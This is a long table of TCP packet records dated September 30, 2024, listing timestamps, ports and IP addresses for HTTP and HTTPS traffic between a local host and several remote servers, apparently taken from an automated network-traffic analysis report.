Sep 30, 2024 18:58:27.991102934 CEST | 49706 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:27.991796017 CEST | 443 | 49706 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:27.991868973 CEST | 49706 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:27.993347883 CEST | 49706 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:27.993417025 CEST | 443 | 49706 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:27.995891094 CEST | 49707 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:27.995923042 CEST | 443 | 49707 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:28.087405920 CEST | 49706 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:28.087429047 CEST | 443 | 49706 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:28.149235010 CEST | 49706 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:28.546598911 CEST | 443 | 49706 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:28.546672106 CEST | 443 | 49706 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:28.546757936 CEST | 49706 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:28.555219889 CEST | 49706 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:28.555238008 CEST | 443 | 49706 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:30.545582056 CEST | 49712 | 443 | 192.168.2.7 | 142.250.186.36 |
Sep 30, 2024 18:58:30.545666933 CEST | 443 | 49712 | 142.250.186.36 | 192.168.2.7 |
Sep 30, 2024 18:58:30.545795918 CEST | 49712 | 443 | 192.168.2.7 | 142.250.186.36 |
Sep 30, 2024 18:58:30.546041012 CEST | 49712 | 443 | 192.168.2.7 | 142.250.186.36 |
Sep 30, 2024 18:58:30.546077013 CEST | 443 | 49712 | 142.250.186.36 | 192.168.2.7 |
Sep 30, 2024 18:58:31.191054106 CEST | 443 | 49712 | 142.250.186.36 | 192.168.2.7 |
Sep 30, 2024 18:58:31.191468954 CEST | 49712 | 443 | 192.168.2.7 | 142.250.186.36 |
Sep 30, 2024 18:58:31.191539049 CEST | 443 | 49712 | 142.250.186.36 | 192.168.2.7 |
Sep 30, 2024 18:58:31.194000006 CEST | 443 | 49712 | 142.250.186.36 | 192.168.2.7 |
Sep 30, 2024 18:58:31.194086075 CEST | 49712 | 443 | 192.168.2.7 | 142.250.186.36 |
Sep 30, 2024 18:58:31.195322037 CEST | 49712 | 443 | 192.168.2.7 | 142.250.186.36 |
Sep 30, 2024 18:58:31.195491076 CEST | 443 | 49712 | 142.250.186.36 | 192.168.2.7 |
Sep 30, 2024 18:58:31.299670935 CEST | 49712 | 443 | 192.168.2.7 | 142.250.186.36 |
Sep 30, 2024 18:58:31.299745083 CEST | 443 | 49712 | 142.250.186.36 | 192.168.2.7 |
Sep 30, 2024 18:58:31.309214115 CEST | 49714 | 80 | 192.168.2.7 | 172.67.149.9 |
Sep 30, 2024 18:58:31.314501047 CEST | 80 | 49714 | 172.67.149.9 | 192.168.2.7 |
Sep 30, 2024 18:58:31.314765930 CEST | 49714 | 80 | 192.168.2.7 | 172.67.149.9 |
Sep 30, 2024 18:58:31.315795898 CEST | 49714 | 80 | 192.168.2.7 | 172.67.149.9 |
Sep 30, 2024 18:58:31.320816040 CEST | 80 | 49714 | 172.67.149.9 | 192.168.2.7 |
Sep 30, 2024 18:58:31.500091076 CEST | 49712 | 443 | 192.168.2.7 | 142.250.186.36 |
Sep 30, 2024 18:58:31.779834986 CEST | 80 | 49714 | 172.67.149.9 | 192.168.2.7 |
Sep 30, 2024 18:58:31.792655945 CEST | 49715 | 443 | 192.168.2.7 | 172.67.149.9 |
Sep 30, 2024 18:58:31.792700052 CEST | 443 | 49715 | 172.67.149.9 | 192.168.2.7 |
Sep 30, 2024 18:58:31.792773008 CEST | 49715 | 443 | 192.168.2.7 | 172.67.149.9 |
Sep 30, 2024 18:58:31.946671009 CEST | 49714 | 80 | 192.168.2.7 | 172.67.149.9 |
Sep 30, 2024 18:58:32.179547071 CEST | 49715 | 443 | 192.168.2.7 | 172.67.149.9 |
Sep 30, 2024 18:58:32.179564953 CEST | 443 | 49715 | 172.67.149.9 | 192.168.2.7 |
Sep 30, 2024 18:58:32.731446981 CEST | 443 | 49715 | 172.67.149.9 | 192.168.2.7 |
Sep 30, 2024 18:58:32.731522083 CEST | 49715 | 443 | 192.168.2.7 | 172.67.149.9 |
Sep 30, 2024 18:58:32.734462023 CEST | 49715 | 443 | 192.168.2.7 | 172.67.149.9 |
Sep 30, 2024 18:58:32.734472990 CEST | 443 | 49715 | 172.67.149.9 | 192.168.2.7 |
Sep 30, 2024 18:58:32.734728098 CEST | 443 | 49715 | 172.67.149.9 | 192.168.2.7 |
Sep 30, 2024 18:58:32.779416084 CEST | 49715 | 443 | 192.168.2.7 | 172.67.149.9 |
Sep 30, 2024 18:58:32.827405930 CEST | 443 | 49715 | 172.67.149.9 | 192.168.2.7 |
Sep 30, 2024 18:58:33.236777067 CEST | 49701 | 443 | 192.168.2.7 | 104.98.116.138 |
Sep 30, 2024 18:58:33.237298965 CEST | 49717 | 443 | 192.168.2.7 | 104.98.116.138 |
Sep 30, 2024 18:58:33.237365961 CEST | 443 | 49717 | 104.98.116.138 | 192.168.2.7 |
Sep 30, 2024 18:58:33.237449884 CEST | 49717 | 443 | 192.168.2.7 | 104.98.116.138 |
Sep 30, 2024 18:58:33.238133907 CEST | 49717 | 443 | 192.168.2.7 | 104.98.116.138 |
Sep 30, 2024 18:58:33.238151073 CEST | 443 | 49717 | 104.98.116.138 | 192.168.2.7 |
Sep 30, 2024 18:58:33.383447886 CEST | 443 | 49715 | 172.67.149.9 | 192.168.2.7 |
Sep 30, 2024 18:58:33.383672953 CEST | 443 | 49715 | 172.67.149.9 | 192.168.2.7 |
Sep 30, 2024 18:58:33.383729935 CEST | 49715 | 443 | 192.168.2.7 | 172.67.149.9 |
Sep 30, 2024 18:58:33.384659052 CEST | 443 | 49701 | 104.98.116.138 | 192.168.2.7 |
Sep 30, 2024 18:58:33.403439999 CEST | 49715 | 443 | 192.168.2.7 | 172.67.149.9 |
Sep 30, 2024 18:58:34.891241074 CEST | 49677 | 443 | 192.168.2.7 | 20.50.201.200 |
Sep 30, 2024 18:58:35.314608097 CEST | 49718 | 443 | 192.168.2.7 | 52.165.165.26 |
Sep 30, 2024 18:58:35.314663887 CEST | 443 | 49718 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:58:35.314728022 CEST | 49718 | 443 | 192.168.2.7 | 52.165.165.26 |
Sep 30, 2024 18:58:35.316095114 CEST | 49718 | 443 | 192.168.2.7 | 52.165.165.26 |
Sep 30, 2024 18:58:35.316106081 CEST | 443 | 49718 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:58:35.963433981 CEST | 49719 | 80 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:35.968393087 CEST | 80 | 49719 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:35.968466997 CEST | 49719 | 80 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:35.969408035 CEST | 49719 | 80 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:35.974258900 CEST | 80 | 49719 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:35.989357948 CEST | 443 | 49718 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:58:35.989440918 CEST | 49718 | 443 | 192.168.2.7 | 52.165.165.26 |
Sep 30, 2024 18:58:35.997745991 CEST | 49718 | 443 | 192.168.2.7 | 52.165.165.26 |
Sep 30, 2024 18:58:35.997775078 CEST | 443 | 49718 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:58:35.998013973 CEST | 443 | 49718 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:58:36.203696966 CEST | 49718 | 443 | 192.168.2.7 | 52.165.165.26 |
Sep 30, 2024 18:58:36.444175005 CEST | 80 | 49719 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:36.446531057 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:36.446578979 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:36.446690083 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:36.449765921 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:36.449784040 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:36.522089005 CEST | 49719 | 80 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:36.764373064 CEST | 49718 | 443 | 192.168.2.7 | 52.165.165.26 |
Sep 30, 2024 18:58:36.811399937 CEST | 443 | 49718 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:58:36.911149979 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:36.911217928 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:36.913342953 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:36.913350105 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:36.913611889 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:36.919445992 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:36.963413954 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:36.986767054 CEST | 443 | 49718 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:58:36.986793995 CEST | 443 | 49718 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:58:36.986802101 CEST | 443 | 49718 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:58:36.986830950 CEST | 443 | 49718 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:58:36.986841917 CEST | 443 | 49718 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:58:36.986850977 CEST | 443 | 49718 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:58:36.986865997 CEST | 49718 | 443 | 192.168.2.7 | 52.165.165.26 |
Sep 30, 2024 18:58:36.986879110 CEST | 443 | 49718 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:58:36.986923933 CEST | 49718 | 443 | 192.168.2.7 | 52.165.165.26 |
Sep 30, 2024 18:58:36.986949921 CEST | 49718 | 443 | 192.168.2.7 | 52.165.165.26 |
Sep 30, 2024 18:58:36.987544060 CEST | 443 | 49718 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:58:36.987552881 CEST | 443 | 49718 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:58:36.987576962 CEST | 443 | 49718 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:58:36.987626076 CEST | 49718 | 443 | 192.168.2.7 | 52.165.165.26 |
Sep 30, 2024 18:58:36.987637043 CEST | 443 | 49718 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:58:36.987663984 CEST | 49718 | 443 | 192.168.2.7 | 52.165.165.26 |
Sep 30, 2024 18:58:36.987677097 CEST | 49718 | 443 | 192.168.2.7 | 52.165.165.26 |
Sep 30, 2024 18:58:37.681583881 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.681641102 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.681677103 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.681741953 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.681756973 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.681890011 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.681919098 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.681922913 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.681932926 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.681982040 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.681994915 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.682001114 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.682049036 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.682049990 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.682059050 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.682099104 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.682105064 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.682218075 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.686357975 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.686402082 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.686429977 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.686474085 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.686480045 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.686521053 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.686532974 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.686803102 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.686845064 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.686847925 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.686853886 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.686898947 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.686904907 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.687622070 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.687654972 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.687675953 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.687681913 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.687774897 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.687813044 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.687819004 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.688117981 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.688659906 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.688729048 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.688750982 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.688851118 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.688858986 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.688982964 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.691683054 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.691729069 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.691811085 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.691871881 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.691878080 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.711194038 CEST | 49718 | 443 | 192.168.2.7 | 52.165.165.26 |
Sep 30, 2024 18:58:37.711229086 CEST | 443 | 49718 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:58:37.711287022 CEST | 49718 | 443 | 192.168.2.7 | 52.165.165.26 |
Sep 30, 2024 18:58:37.711293936 CEST | 443 | 49718 | 52.165.165.26 | 192.168.2.7 |
Sep 30, 2024 18:58:37.735213995 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.739152908 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.739237070 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.739269018 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.739299059 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.739350080 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.739350080 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.739358902 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.739558935 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.739589930 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.739623070 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.739630938 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.739641905 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.739702940 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.740861893 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.740931034 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.741043091 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.741108894 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.741113901 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.782085896 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.811486006 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.811496019 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.811534882 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.811557055 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.811575890 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.811587095 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.811604023 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.811652899 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.811652899 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.811661005 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.812088966 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.812150002 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.812155962 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.812211990 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.812223911 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.812269926 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.812293053 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.812325954 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.812344074 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.812356949 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.812575102 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.812943935 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.813019991 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.824460030 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.824513912 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.933382034 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.933536053 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.933551073 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.933605909 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.933630943 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.933708906 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.933731079 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.933738947 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.933758974 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.933779955 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.934492111 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.934580088 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.934586048 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.934633970 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.934644938 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.934648037 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.934691906 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.935240030 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.935302973 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:37.935306072 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.935314894 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:37.935379028 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.063450098 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.063522100 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.063551903 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.063560963 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.063613892 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.063776970 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.063847065 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.063853025 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.063951969 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.063983917 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.064060926 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.064388990 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.064459085 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.064831972 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.064930916 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.064954042 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.064959049 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.065061092 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.110366106 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.110387087 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.157087088 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.365487099 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.365542889 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.365566015 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.365575075 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.365592003 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.365606070 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.365650892 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.365650892 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.365655899 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.365832090 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.365873098 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.365878105 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.365967035 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.366029978 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.366075993 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.366101980 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.366106033 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.366112947 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.366125107 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.366139889 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.366183043 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.366183043 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
Sep 30, 2024 18:58:38.366188049 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.366472006 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.7 |
Sep 30, 2024 18:58:38.366679907 CEST | 49721 | 443 | 192.168.2.7 | 188.114.97.3 |
